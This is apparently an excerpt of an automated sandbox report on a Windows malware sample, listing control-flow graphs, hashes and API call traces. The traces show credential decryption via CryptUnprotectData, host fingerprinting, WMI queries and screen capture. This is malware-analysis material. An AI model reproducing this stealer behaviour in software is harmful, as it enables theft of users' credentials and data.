                          • Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                          • Instruction Fuzzy Hash: 94314D72244246ABD734CF54CC91FEA73A5BFC8B14F158509EB09AF281C6B0BA418B94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 34 8c2880-8c28a4 35 8c28a6-8c28ad 34->35 36 8c28b0-8c28d5 34->36 39 8c28d8-8c28eb 36->39 41 8c2ab4-8c2b56 VirtualProtect 39->41 42 8c28f1-8c28fc 39->42 50 8c2b5d-8c2b71 41->50 51 8c2b58 41->51 42->41 43 8c2902-8c290d 42->43 43->41 44 8c2913-8c2921 43->44 44->39 46 8c2923-8c292b 44->46 47 8c292e-8c293a 46->47 47->41 49 8c2940-8c294a 47->49 49->41 52 8c2950-8c295c 49->52 51->50 53 8c295e-8c2964 52->53 54 8c2965-8c296e 52->54 53->54 54->41 55 8c2974-8c297f 54->55 55->41 56 8c2985-8c2994 55->56 56->41 57 8c299a-8c29a8 56->57 57->47 58 8c29aa-8c29b9 57->58 59 8c29bf 58->59 60 8c2aaa-8c2ab1 58->60 61 8c29ca-8c29e5 59->61 62 8c2a2b-8c2a41 61->62 63 8c29e7-8c29f3 61->63 71 8c2a46-8c2a4f 62->71 64 8c29fc-8c2a05 63->64 65 8c29f5-8c29fb 63->65 64->62 66 8c2a07-8c2a12 64->66 65->64 66->62 68 8c2a14-8c2a23 66->68 68->62 69 8c2a25-8c2a29 68->69 69->71 71->41 73 8c2a51-8c2a5f 71->73 73->41 74 8c2a61-8c2a6e 73->74 75 8c2a78-8c2a81 74->75 76 8c2a70-8c2a77 74->76 75->41 77 8c2a83-8c2a90 75->77 76->75 77->41 78 8c2a92-8c2aa4 77->78 78->59 78->60
                          Memory Dump Source
                          • Source File: 00000000.00000002.2236499381.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8c0000_mWAik6b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4165435f5b696cb3ed034d83180693ecc4059f3ef8d4a783ae924532d8504652
                          • Instruction ID: 2edac84e85ad8f5ea42aea72920101dfafd7f8a4b77921a90b3cb3f0712c20eb
                          • Opcode Fuzzy Hash: 4165435f5b696cb3ed034d83180693ecc4059f3ef8d4a783ae924532d8504652
                          • Instruction Fuzzy Hash: DDA11570A002699FCB15DFA9D490AADFBF1FF58314F28C659E459E7252C330A881CBA4

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 79 8c2104-8c2b56 VirtualProtect 82 8c2b5d-8c2b71 79->82 83 8c2b58 79->83 83->82
                          APIs
                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 008C2B49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2236499381.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8c0000_mWAik6b.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 08d19943591cd4bbe3e990b03c9f6d8237574f04abfee52a72f717abd93e2939
                          • Instruction ID: fdb2518c678feb22abc5b78a59d5fc37f3741fc254b0a852d7c241334067e14a
                          • Opcode Fuzzy Hash: 08d19943591cd4bbe3e990b03c9f6d8237574f04abfee52a72f717abd93e2939
                          • Instruction Fuzzy Hash: FC21C2B5D0161DAFCB00DF9AD884ADEFBB4FB49310F10812AE918A7250D374A954CFE5

                          Execution Graph

                          Execution Coverage:8.4%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:69%
                          Total number of Nodes:348
                          Total number of Limit Nodes:22
                          execution_graph 13512 40d500 13513 40d58e 13512->13513 13514 40d569 13512->13514 13517 43ef30 LdrInitializeThunk 13513->13517 13514->13513 13518 43ef30 LdrInitializeThunk 13514->13518 13517->13513 13518->13513 13330 416242 13333 416240 13330->13333 13331 41646a 13333->13330 13333->13331 13334 441d10 13333->13334 13335 441d30 13334->13335 13336 441e1e 13335->13336 13338 43ef30 LdrInitializeThunk 13335->13338 13336->13333 13338->13336 13519 441f00 13520 441f19 13519->13520 13521 441f3f 13519->13521 13520->13521 13525 43ef30 LdrInitializeThunk 13520->13525 13523 441f68 13523->13521 13526 43ef30 LdrInitializeThunk 13523->13526 13525->13523 13526->13521 13339 41734a 13340 417350 13339->13340 13352 41737e 13340->13352 13354 43ef30 LdrInitializeThunk 13340->13354 13342 41770c 13342->13342 13344 4177b6 13342->13344 13351 417884 13342->13351 13353 41784e 13342->13353 13355 4190c0 13342->13355 13344->13351 13344->13353 13393 43ef30 LdrInitializeThunk 13344->13393 13345 418f6e 13347 4175b2 13350 417593 CryptUnprotectData 13350->13342 13350->13344 13350->13347 13350->13351 13350->13353 13351->13345 13395 43ef30 LdrInitializeThunk 13351->13395 13352->13342 13352->13344 13352->13347 13352->13350 13353->13351 13394 43ef30 LdrInitializeThunk 13353->13394 13354->13352 13356 4190e3 13355->13356 13358 4190fe 13355->13358 13356->13358 13396 43ef30 LdrInitializeThunk 13356->13396 13359 4191ce 13358->13359 13397 43ef30 LdrInitializeThunk 13358->13397 13360 41922e 13359->13360 13385 4194f2 13359->13385 13398 43ef30 LdrInitializeThunk 13359->13398 13371 419319 13360->13371 13399 43d400 13360->13399 13364 4192be 13403 43d420 13364->13403 13366 419289 13366->13364 13402 43ef30 LdrInitializeThunk 13366->13402 13369 419565 FreeLibrary 13370 4194c3 13369->13370 13369->13385 13370->13385 13408 43ef30 LdrInitializeThunk 13370->13408 13371->13369 13371->13370 13372 4194be 13371->13372 13371->13385 13407 43ef30 LdrInitializeThunk 13371->13407 13372->13369 13374 41951c 13374->13369 13375 419523 FreeLibrary 13374->13375 13376 4195cc 13375->13376 13377 41953a 13375->13377 13376->13376 13379 43d400 RtlAllocateHeap 13376->13379 13376->13385 13380 419558 13377->13380 13409 43ef30 LdrInitializeThunk 13377->13409 13384 41969c 13379->13384 13380->13376 13410 43ef30 LdrInitializeThunk 13380->13410 13381 4196c9 13383 43d420 RtlFreeHeap 13381->13383 13383->13385 13384->13381 13411 43ef30 LdrInitializeThunk 13384->13411 13385->13344 13389 43d420 RtlFreeHeap 13391 4196ef 13389->13391 13390 43d400 RtlAllocateHeap 13390->13391 13391->13381 13391->13389 13391->13390 13392 43ef30 LdrInitializeThunk 13391->13392 13412 43d6c0 13391->13412 13416 43d7a0 13391->13416 13392->13391 13393->13353 13394->13351 13395->13345 13396->13358 13397->13359 13398->13360 13420 440340 13399->13420 13401 43d40a RtlAllocateHeap 13401->13366 13402->13364 13404 43d433 13403->13404 13405 43d444 13403->13405 13406 43d438 RtlFreeHeap 13404->13406 13405->13371 13406->13405 13407->13374 13408->13385 13409->13380 13410->13376 13411->13391 13413 43d73e 13412->13413 13414 43d6cd 13412->13414 13413->13391 13414->13413 13422 43ef30 LdrInitializeThunk 13414->13422 13417 43d7ce 13416->13417 13418 43d7a6 13416->13418 13417->13391 13418->13417 13423 43ef30 LdrInitializeThunk 13418->13423 13421 440350 13420->13421 13421->13401 13421->13421 13422->13413 13423->13417 13424 43f54d 13425 43f56c 13424->13425 13426 43f58e 13424->13426 13425->13426 13428 43ef30 LdrInitializeThunk 13425->13428 13428->13426 13429 42ead2 13431 42eaf0 13429->13431 13430 42eb7e 13431->13430 13433 43ef30 LdrInitializeThunk 13431->13433 13433->13430 13527 42f293 13528 42f296 13527->13528 13529 42f3a9 GetComputerNameExA 13528->13529 13434 43d450 13435 43d472 13434->13435 13436 43d48e 13434->13436 13435->13436 13444 43ef30 LdrInitializeThunk 13435->13444 13437 43d689 13436->13437 13439 43d400 RtlAllocateHeap 13436->13439 13441 43d524 13439->13441 13440 43d420 RtlFreeHeap 13440->13437 13443 43d55e 13441->13443 13445 43ef30 LdrInitializeThunk 13441->13445 13443->13440 13444->13436 13445->13443 13530 43a490 13532 43a4b0 13530->13532 13531 43a4fe 13532->13531 13538 43ef30 LdrInitializeThunk 13532->13538 13534 43a51f 13534->13531 13536 43a54e 13534->13536 13539 43ef30 LdrInitializeThunk 13534->13539 13536->13531 13540 43ef30 LdrInitializeThunk 13536->13540 13538->13534 13539->13536 13540->13531 13446 43f454 13449 43f460 13446->13449 13447 43f60e 13448 43f51f 13448->13447 13453 43ef30 LdrInitializeThunk 13448->13453 13449->13448 13452 43ef30 LdrInitializeThunk 13449->13452 13452->13448 13453->13447 13459 41095c 13460 410979 13459->13460 13461 410c6b RtlExpandEnvironmentStrings 13460->13461 13462 40ed4c 13460->13462 13461->13462 13463 43845e 13464 43847c 13463->13464 13465 438491 GetUserDefaultUILanguage 13464->13465 13466 4384c0 13465->13466 13467 43f8dd GetForegroundWindow 13471 440c40 13467->13471 13469 43f8ed GetForegroundWindow 13470 43f900 13469->13470 13472 440c51 13471->13472 13472->13469 13541 40ca9e CoInitializeSecurity CoInitializeSecurity 13473 4338e1 CoSetProxyBlanket 13542 4207a0 13543 4207ae 13542->13543 13545 420800 13542->13545 13543->13545 13546 41ec00 13543->13546 13547 41ec6b 13546->13547 13558 414510 13547->13558 13559 414530 13558->13559 13562 441ba0 13559->13562 13561 41464d 13564 441bc0 13562->13564 13563 441cbe 13563->13561 13564->13563 13566 43ef30 LdrInitializeThunk 13564->13566 13566->13563 13567 43f6a1 13568 43f6a0 13567->13568 13568->13567 13570 43f6ae 13568->13570 13571 43ef30 LdrInitializeThunk 13568->13571 13571->13570 13474 43a5e0 13475 43a610 13474->13475 13475->13475 13476 43a892 CoCreateInstance 13475->13476 13477 43acc2 13476->13477 13478 43a8db SysAllocString 13476->13478 13479 43acd2 GetVolumeInformationW 13477->13479 13481 43a96a 13478->13481 13487 43ace9 13479->13487 13482 43a972 CoSetProxyBlanket 13481->13482 13483 43acb1 SysFreeString 13481->13483 13484 43a992 SysAllocString 13482->13484 13485 43aca7 13482->13485 13483->13477 13488 43aa70 13484->13488 13485->13483 13488->13488 13489 43aaad SysAllocString 13488->13489 13492 43aad4 13489->13492 13490 43ac8e SysFreeString SysFreeString 13490->13485 13491 43ac84 13491->13490 13492->13490 13492->13491 13493 43ab1c VariantInit 13492->13493 13495 43ab70 13493->13495 13494 43ac73 VariantClear 13494->13491 13495->13494 13496 42f3e7 13497 42f3f1 13496->13497 13497->13497 13498 42f4a9 GetComputerNameExA 13497->13498 13572 4368a8 13575 436a40 13572->13575 13576 436a7d GetObjectW 13575->13576 13578 436bc4 13576->13578 13579 40d22e 13581 40d254 13579->13581 13582 40d23a 13579->13582 13580 40d29e 13603 424050 13580->13603 13581->13580 13672 43ef30 LdrInitializeThunk 13581->13672 13582->13581 13671 43ef30 LdrInitializeThunk 13582->13671 13586 40d9ce 13615 4247c0 13586->13615 13588 40d9ee 13624 424a40 13588->13624 13590 40da0e 13633 427230 13590->13633 13598 40da49 13599 4297e0 RtlExpandEnvironmentStrings 13598->13599 13600 40da69 13599->13600 13601 436020 6 API calls 13600->13601 13602 40da92 13601->13602 13604 4240b0 13603->13604 13604->13604 13605 4240ff RtlExpandEnvironmentStrings 13604->13605 13606 424150 13605->13606 13607 4241d5 RtlExpandEnvironmentStrings 13606->13607 13608 4241fc 13607->13608 13608->13608 13609 441d10 LdrInitializeThunk 13608->13609 13614 424331 13609->13614 13610 4244d1 13611 4244e2 13610->13611 13673 420ba0 13610->13673 13611->13586 13613 441d10 LdrInitializeThunk 13613->13610 13614->13610 13614->13611 13614->13613 13614->13614 13616 424860 13615->13616 13616->13616 13617 424886 RtlExpandEnvironmentStrings 13616->13617 13620 4248d0 13617->13620 13618 42494e 13691 41eb50 13618->13691 13619 42479f 13619->13588 13620->13618 13620->13619 13623 42492f RtlExpandEnvironmentStrings 13620->13623 13695 441230 13620->13695 13623->13618 13623->13619 13623->13620 13625 424a4e 13624->13625 13707 440df0 13625->13707 13627 441230 3 API calls 13629 424917 13627->13629 13628 42479f 13628->13590 13629->13627 13629->13628 13630 42494e 13629->13630 13632 42492f RtlExpandEnvironmentStrings 13629->13632 13631 41eb50 3 API calls 13630->13631 13631->13628 13632->13628 13632->13629 13632->13630 13638 4272ba 13633->13638 13634 40da2e 13644 427a00 13634->13644 13636 441230 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13636->13638 13637 440df0 LdrInitializeThunk 13637->13638 13638->13634 13638->13636 13638->13637 13640 42779d 13638->13640 13712 43eeb0 13638->13712 13723 440ed0 13638->13723 13733 441750 13638->13733 13744 43ef30 LdrInitializeThunk 13638->13744 13640->13634 13743 43ef30 LdrInitializeThunk 13640->13743 13645 427a30 13644->13645 13647 427a7e 13645->13647 13749 43ef30 LdrInitializeThunk 13645->13749 13646 40da37 13654 427d90 13646->13654 13647->13646 13648 43d400 RtlAllocateHeap 13647->13648 13651 427b66 13648->13651 13650 43d420 RtlFreeHeap 13650->13646 13653 427bde 13651->13653 13750 43ef30 LdrInitializeThunk 13651->13750 13653->13650 13751 427db0 13654->13751 13671->13581 13672->13580 13674 441ba0 LdrInitializeThunk 13673->13674 13676 420be0 13674->13676 13675 4211a9 13675->13611 13676->13675 13677 43d400 RtlAllocateHeap 13676->13677 13678 420c39 13677->13678 13681 420c50 13678->13681 13688 43ef30 LdrInitializeThunk 13678->13688 13680 43d420 RtlFreeHeap 13683 42119b 13680->13683 13682 43d400 RtlAllocateHeap 13681->13682 13685 42118b 13681->13685 13687 43d420 RtlFreeHeap 13681->13687 13689 43ef30 LdrInitializeThunk 13681->13689 13682->13681 13683->13675 13690 43ef30 LdrInitializeThunk 13683->13690 13685->13680 13687->13681 13688->13678 13689->13681 13690->13683 13692 41eb90 13691->13692 13692->13692 13693 420ba0 3 API calls 13692->13693 13694 41ebf4 13693->13694 13694->13619 13696 44125e 13695->13696 13698 441245 13695->13698 13697 44147b 13696->13697 13699 43d400 RtlAllocateHeap 13696->13699 13697->13620 13698->13696 13705 43ef30 LdrInitializeThunk 13698->13705 13702 4412cc 13699->13702 13701 43d420 RtlFreeHeap 13701->13697 13704 4412ff 13702->13704 13706 43ef30 LdrInitializeThunk 13702->13706 13704->13701 13704->13704 13705->13696 13706->13704 13709 440e10 13707->13709 13708 440e9f 13708->13629 13709->13708 13711 43ef30 LdrInitializeThunk 13709->13711 13711->13708 13713 43ef01 13712->13713 13714 43eed6 13712->13714 13715 43eef5 13712->13715 13716 43eeea 13712->13716 13717 43eec8 13712->13717 13718 43eef0 13712->13718 13719 43d420 RtlFreeHeap 13713->13719 13722 43eedb RtlReAllocateHeap 13714->13722 13721 43d420 RtlFreeHeap 13715->13721 13720 43d400 RtlAllocateHeap 13716->13720 13717->13713 13717->13714 13717->13715 13717->13718 13718->13638 13719->13718 13720->13718 13721->13713 13722->13718 13724 440ee0 13723->13724 13726 440f9b 13724->13726 13745 43ef30 LdrInitializeThunk 13724->13745 13725 44121f 13725->13638 13726->13725 13727 43d400 RtlAllocateHeap 13726->13727 13730 441027 13727->13730 13729 44113a 13731 43d420 RtlFreeHeap 13729->13731 13730->13729 13746 43ef30 LdrInitializeThunk 13730->13746 13731->13725 13734 44175f 13733->13734 13736 44187f 13734->13736 13747 43ef30 LdrInitializeThunk 13734->13747 13735 441a2f 13735->13638 13736->13735 13738 43d400 RtlAllocateHeap 13736->13738 13740 441903 13738->13740 13739 43d420 RtlFreeHeap 13739->13735 13742 44196f 13740->13742 13748 43ef30 LdrInitializeThunk 13740->13748 13742->13739 13743->13634 13744->13638 13745->13726 13746->13729 13747->13736 13748->13742 13749->13647 13750->13653 13752 427df0 13751->13752 13752->13752 13757 43d450 13752->13757 13755 43d6c0 LdrInitializeThunk 13756 427ea3 13755->13756 13758 43d472 13757->13758 13759 43d48e 13757->13759 13758->13759 13767 43ef30 LdrInitializeThunk 13758->13767 13760 427e4c 13759->13760 13762 43d400 RtlAllocateHeap 13759->13762 13760->13755 13764 43d524 13762->13764 13763 43d420 RtlFreeHeap 13763->13760 13766 43d55e 13764->13766 13768 43ef30 LdrInitializeThunk 13764->13768 13766->13763 13767->13759 13768->13766 13769 4086b0 13771 4086bf 13769->13771 13770 408915 ExitProcess 13771->13770 13772 4086d4 GetCurrentProcessId GetCurrentThreadId 13771->13772 13781 4088fe 13771->13781 13774 4086fa 13772->13774 13775 4086fe SHGetSpecialFolderPathW GetForegroundWindow 13772->13775 13774->13775 13776 4087c1 13775->13776 13777 43d400 RtlAllocateHeap 13776->13777 13778 40883a 13777->13778 13778->13781 13783 40ca30 CoInitializeEx 13778->13783 13784 43ee90 13781->13784 13787 440320 13784->13787 13786 43ee95 FreeLibrary 13786->13770 13788 440329 13787->13788 13788->13786 13789 4361b0 13790 4361de GetSystemMetrics GetSystemMetrics 13789->13790 13791 43621b DeleteObject 13790->13791 13793 436268 SelectObject 13791->13793 13795 4362e0 SelectObject 13793->13795 13796 4362fd DeleteObject 13795->13796 13499 43f37b 13500 43f71f 13499->13500 13501 43f818 13500->13501 13503 43ef30 LdrInitializeThunk 13500->13503 13503->13501 13504 42e379 13505 42e383 13504->13505 13505->13505 13506 42e75a GetPhysicallyInstalledSystemMemory 13505->13506 13507 42e780 13506->13507 13507->13507 13508 432f78 13511 414500 13508->13511 13510 432f7d CoSetProxyBlanket 13511->13510 13798 42093c 13799 420960 13798->13799 13799->13799 13800 441d10 LdrInitializeThunk 13799->13800 13801 4209e0 13800->13801

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 43a5e0-43a607 1 43a610-43a641 0->1 1->1 2 43a643-43a654 1->2 3 43a660-43a67d 2->3 3->3 4 43a67f-43a6bf 3->4 5 43a6c0-43a6d2 4->5 5->5 6 43a6d4-43a6f0 5->6 8 43a6f2-43a6ff 6->8 9 43a745-43a74e 6->9 10 43a700-43a72c 8->10 11 43a750-43a77f 9->11 10->10 12 43a72e-43a73b 10->12 11->11 13 43a781-43a7df 11->13 12->9 14 43a7e0-43a80c 13->14 14->14 15 43a80e-43a85a 14->15 16 43a860-43a890 15->16 16->16 17 43a892-43a8d5 CoCreateInstance 16->17 18 43acc2-43ace7 call 4406d0 GetVolumeInformationW 17->18 19 43a8db-43a90f 17->19 24 43acf1-43acf6 18->24 25 43ace9-43aced 18->25 21 43a910-43a943 19->21 21->21 23 43a945-43a96c SysAllocString 21->23 28 43a972-43a98c CoSetProxyBlanket 23->28 29 43acb1-43acbe SysFreeString 23->29 27 43ad0d-43ad14 24->27 25->24 30 43ad20-43ad3f 27->30 31 43ad16-43ad1d 27->31 32 43a992-43a9a8 28->32 33 43aca7-43acad 28->33 29->18 34 43ad40-43ad7d 30->34 31->30 35 43a9b0-43a9e2 32->35 33->29 34->34 36 43ad7f-43adaf 34->36 35->35 37 43a9e4-43aa64 SysAllocString 35->37 38 43adb0-43adc4 36->38 40 43aa70-43aaab 37->40 38->38 39 43adc6-43adf2 call 41d1a0 38->39 44 43ae00-43ae08 39->44 40->40 42 43aaad-43aada SysAllocString 40->42 47 43aae0-43ab02 42->47 48 43ac8e-43aca0 SysFreeString * 2 42->48 44->44 46 43ae0a-43ae0c 44->46 49 43ae12-43ae22 call 4080b0 46->49 50 43ad00-43ad07 46->50 55 43ac84-43ac8a 47->55 56 43ab08-43ab0b 47->56 48->33 49->50 50->27 52 43ae27-43ae2e 50->52 55->48 56->55 57 43ab11-43ab16 56->57 57->55 58 43ab1c-43ab67 VariantInit 57->58 59 43ab70-43ab84 58->59 59->59 60 43ab86-43ab94 59->60 61 43ab98-43ab9a 60->61 62 43ac73-43ac80 VariantClear 61->62 63 43aba0-43aba9 61->63 62->55 63->62 64 43abaf-43abc0 63->64 65 43abc2-43abc7 64->65 66 43ac05 64->66 67 43abdc-43abe0 65->67 68 43ac07-43ac2f call 407f20 call 408d80 66->68 69 43abe2-43abeb 67->69 70 43abd0 67->70 79 43ac31 68->79 80 43ac36-43ac45 68->80 74 43abf2-43abf6 69->74 75 43abed-43abf0 69->75 73 43abd1-43abda 70->73 73->67 73->68 74->73 77 43abf8-43ac03 74->77 75->73 77->73 79->80 81 43ac47 80->81 82 43ac4c-43ac6f call 407f50 call 407f30 80->82 81->82 82->62
                          APIs
                          • CoCreateInstance.OLE32(@IJK,00000000,00000001,F3F2F1FD,00000000), ref: 0043A8CD
                          • SysAllocString.OLEAUT32(93AC5B3B), ref: 0043A946
                          • CoSetProxyBlanket.COMBASE(3E38FAA6,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043A984
                          • SysAllocString.OLEAUT32(B6E0B0E8), ref: 0043A9E9
                          • SysAllocString.OLEAUT32(E43AE606), ref: 0043AAB2
                          • VariantInit.OLEAUT32(?), ref: 0043AB24
                          • VariantClear.OLEAUT32(?), ref: 0043AC74
                          • SysFreeString.OLEAUT32(?), ref: 0043AC98
                          • SysFreeString.OLEAUT32(?), ref: 0043AC9E
                          • SysFreeString.OLEAUT32(00000000), ref: 0043ACB2
                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,93AC5B3B,00000000,00000000,00000000,00000000), ref: 0043ACE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                          • String ID: S;M$,C.}$1>$:$?G5A$@IJK$nG(&$~G(&
                          • API String ID: 2573436264-2772922692
                          • Opcode ID: da629e57f63015a9c389497c16c4dc5391b223c6f7837b5b1eeed4cd0f73d98b
                          • Instruction ID: 5985474516b47b6c1a9faa6d824ff9722f2614eb3eabf9417dd0f8c4aa3c9ad8
                          • Opcode Fuzzy Hash: da629e57f63015a9c389497c16c4dc5391b223c6f7837b5b1eeed4cd0f73d98b
                          • Instruction Fuzzy Hash: 3422E975A483409FE310CF28C880B9BBBE5EBC9314F14992DE5D99B2A1D778D805CB97

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: Object$DeleteMetricsSelectSystem
                          • String ID: $4fC$F6!N$[iC$fC
                          • API String ID: 3911056724-78709177
                          • Opcode ID: 4e54b1156f46837110023b9f57f5fd3c5b85bb095aa482201ca79965f1b273d1
                          • Instruction ID: bb81f30a9f5876ddf4aa7c3b53746c2368f33a00f551faf7590d58348a7f966f
                          • Opcode Fuzzy Hash: 4e54b1156f46837110023b9f57f5fd3c5b85bb095aa482201ca79965f1b273d1
                          • Instruction Fuzzy Hash: 837166B04197808FE360EF65D98878EBBE0BBC5708F51891EE5D89B250DBB45448CF87

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 96 420ba0-420be5 call 441ba0 99 4211fa-42120a 96->99 100 420beb-420c41 call 4144e0 call 43d400 96->100 105 420c43-420c4e 100->105 106 420c50 105->106 107 420c55-420c6a 105->107 108 420d08-420d10 106->108 109 420c71-420c7d 107->109 110 420c6c 107->110 113 420d12 108->113 114 420d14-420d19 108->114 111 420cf9-420cfc 109->111 112 420c7f-420cef call 43ef30 109->112 110->111 116 420d00-420d03 111->116 117 420cfe 111->117 120 420cf4 112->120 113->114 118 42118f-42119f call 43d420 114->118 119 420d1f-420d2f 114->119 116->105 117->108 129 4211a1-4211a7 118->129 122 420d31-420d4a 119->122 120->111 123 420ed0-420ed3 122->123 124 420d50-420d70 122->124 127 420ed5-420ed9 123->127 128 420edb-420eec call 43d400 123->128 126 420d72-420d75 124->126 130 420d77-420d99 126->130 131 420d9b-420dbd call 421210 126->131 132 420f02-420f04 127->132 148 420efe-420f00 128->148 149 420eee-420ef9 128->149 134 4211ab-4211bf 129->134 135 4211a9 129->135 130->126 131->123 156 420dc3-420de9 131->156 136 420f0a-420f2f 132->136 137 421168-42116d 132->137 138 4211c3-4211ca 134->138 139 4211c1 134->139 135->99 142 420f33-420f36 136->142 145 421179-42117d 137->145 146 42116f-421177 137->146 143 4211ea-4211ed 138->143 144 4211cc-4211e5 call 43ef30 138->144 139->143 150 420f95-420fab 142->150 151 420f38-420f93 142->151 153 4211f3-4211f8 143->153 154 4211ef-4211f1 143->154 144->143 155 42117f 145->155 146->155 148->132 157 421181-421185 149->157 158 420fad-420fb8 150->158 151->142 153->129 154->99 155->157 159 420deb-420dee 156->159 157->122 160 42118b-42118d 157->160 161 420fba 158->161 162 420fbf-420fd9 158->162 163 420df0-420e05 159->163 164 420e07-420e1e call 421210 159->164 160->118 166 421087-42108f 161->166 167 420fe0-420fec 162->167 168 420fdb 162->168 163->159 177 420e20-420e24 164->177 178 420e29-420e40 164->178 170 421093-4210b2 166->170 171 421091 166->171 172 421076-42107b 167->172 173 420ff2-42106c call 43ef30 167->173 168->172 175 4210b4-4210b7 170->175 171->170 179 42107f-421082 172->179 180 42107d 172->180 183 421071 173->183 181 4210fb-421101 175->181 182 4210b9-4210f9 175->182 177->123 184 420e42 178->184 185 420e44-420ece call 407f20 call 414140 call 407f30 178->185 179->158 180->166 187 421103-421107 181->187 188 421137-42113a 181->188 182->175 183->172 184->185 185->123 190 421109-421110 187->190 191 421151-421157 188->191 192 42113c-42114f call 43d420 188->192 195 421112-42111e 190->195 196 421120-421129 190->196 193 421159-42115c 191->193 192->193 193->137 198 42115e-421166 193->198 195->190 200 42112b 196->200 201 42112d 196->201 198->157 203 421133-421135 200->203 201->203 203->188
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID: !@$,$@$B$C$I$J$L$M$R$\$]$}
                          • API String ID: 1279760036-1120542364
                          • Opcode ID: e06bbe348a4304636f8b219e4fe7b28ad15d815e0ebb9841dad544f937a5a5c8
                          • Instruction ID: 157a8e2f561f5ccc7da446f734911416100d03f92a274c8de8e3b1fe340459a7
                          • Opcode Fuzzy Hash: e06bbe348a4304636f8b219e4fe7b28ad15d815e0ebb9841dad544f937a5a5c8
                          • Instruction Fuzzy Hash: 0302AE7160C3608FD324CF28D44436FBBE2ABD9314F558A2EE1D9873A2D77998458B4B

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 207 424050-4240a7 208 4240b0-4240fd 207->208 208->208 209 4240ff-424149 RtlExpandEnvironmentStrings 208->209 210 424150-424191 209->210 210->210 211 424193-42419f 210->211 212 4241c0 211->212 213 4241a6-4241ac 211->213 214 4241c8 212->214 213->214 215 4241ae-4241b3 213->215 216 4241cf-4241f5 call 407f20 RtlExpandEnvironmentStrings 214->216 215->216 219 424204-424210 216->219 220 4241fc 216->220 221 424212-424217 219->221 222 424219 219->222 220->219 223 424220-424258 call 407f20 221->223 222->223 226 424260-4242c1 223->226 226->226 227 4242c3-4242ce 226->227 228 4242d0-4242d5 227->228 229 4242f1-4242fe 227->229 230 4242e0-4242ef 228->230 231 424300-424304 229->231 232 424321-42433d call 441d10 229->232 230->229 230->230 233 424310-42431f 231->233 236 4244e2-4244ec 232->236 237 424354-42435d 232->237 238 424344-42434b 232->238 239 4244f4 232->239 240 424674-42468f 232->240 241 4244fa-424500 call 407f30 232->241 242 424509-4245b3 232->242 233->232 233->233 236->239 244 424366 237->244 245 42435f-424364 237->245 238->237 243 424690-4246a2 240->243 241->242 247 4245c0-424648 242->247 243->243 248 4246a4-424727 243->248 249 42436d-42441a call 407f20 244->249 245->249 247->247 251 42464e-424661 call 420ba0 247->251 252 424730-424751 248->252 259 424420-424461 249->259 257 424666-42466b 251->257 252->252 255 424753-424776 call 420a10 252->255 264 42477e 255->264 257->240 259->259 261 424463-42446e 259->261 262 424470-424477 261->262 263 424491-42449e 261->263 265 424480-42448f 262->265 266 4244a0-4244a4 263->266 267 4244c1-4244db call 441d10 263->267 271 424784-42478d call 407f30 264->271 265->263 265->265 269 4244b0-4244bf 266->269 267->236 267->239 267->240 267->241 267->264 267->271 272 4247b2-4247be 267->272 273 424790 267->273 274 4247b0 267->274 275 424796-42479c call 407f30 267->275 276 42479f-4247a4 267->276 269->267 269->269 271->273 274->272 275->276 276->274
                          APIs
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00424133
                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004241EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.2276925859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_400000_mWAik6b.jbxd
                          Similarity
                          • API ID: EnvironmentExpandStrings
                          • String ID: 3['E$:_-Y$;8$D@$SL$X[
                          • API String ID: 237503144-4112931091
                          • Opcode ID: a07caa98abe506f063f4130f1653f2fe3134142310136db010a344f7be73cbed
                          • Instruction ID: 60eafbf21fbf3127c15a03e93e3c494839048f86b397655564221d09e984a81b
                          • Opcode Fuzzy Hash: a07caa98abe506f063f4130f1653f2fe3134142310136db010a344f7be73cbed
                          • Instruction Fuzzy Hash: BF022FB56083548FD310DF65E88126BBBE1FBC5344F14892DF9D58B350EBB89906CB86

                          Control-flow Graph

                          • Executed
                          • Not Executed
